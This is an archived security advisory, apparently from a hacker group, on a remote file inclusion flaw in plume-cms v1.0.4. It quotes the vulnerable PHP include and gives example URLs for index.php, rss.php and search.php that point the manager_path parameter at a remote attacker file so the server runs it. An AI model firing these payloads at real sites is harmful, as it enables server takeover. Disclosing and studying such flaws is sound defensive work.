Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: b06-3421.htm

plume-cms v1.0.4 Multiple Remote File include



plume-cms v1.0.4 Multiple Remote File include
plume-cms v1.0.4 Multiple Remote File include



plume cms  v1.0.4 Multiple Remote File include=0D
-------------------------------------------------=0D
Discovered By CrAsh_oVeR_rIdE=0D
Arabian Security Team=0D
-------------------------------------------------=0D
site of script:http://www.plume-cms.net/=0D 
-------------------------------------------------=0D
Vulnerable: plume cms  v1.0.4=0D
-------------------------------------------------=0D
vulnerable code:=0D
----------------------=0D
include $_PX_config['manager_path'].'/frontinc/class.template.php';=0D
_PX_config[manager_path] parameter File include=0D
-----------------------------------------------------------------------------------------------------------------------------------------=0D
vulnerable files  :=0D
--------------------=0D
index.php=0D
rss.php=0D
search.php=0D
-------------------------------------------------=0D
example:=0D
www.example.com/(path)/index.php?_PX_config[manager_path]=http://evilcode.txt?=0D 
www.example.com/(path)/rss.php?_PX_config[manager_path]=http://evilcode.txt?=0D 
www.example.com/(path)/search.php?_PX_config[manager_path]=http://evilcode.txt?=0D 
-------------------------------------------------=0D
Discovered By CrAsh_oVeR_rIdE=0D
E-mail:KARKOR23@hotmail.com=0D 
Site:www.lezr.com=0D 
Greetz:KING-HACKER,YOUNG HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3, mr-hcr AND ALL LEZR.COM Member=0D
=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH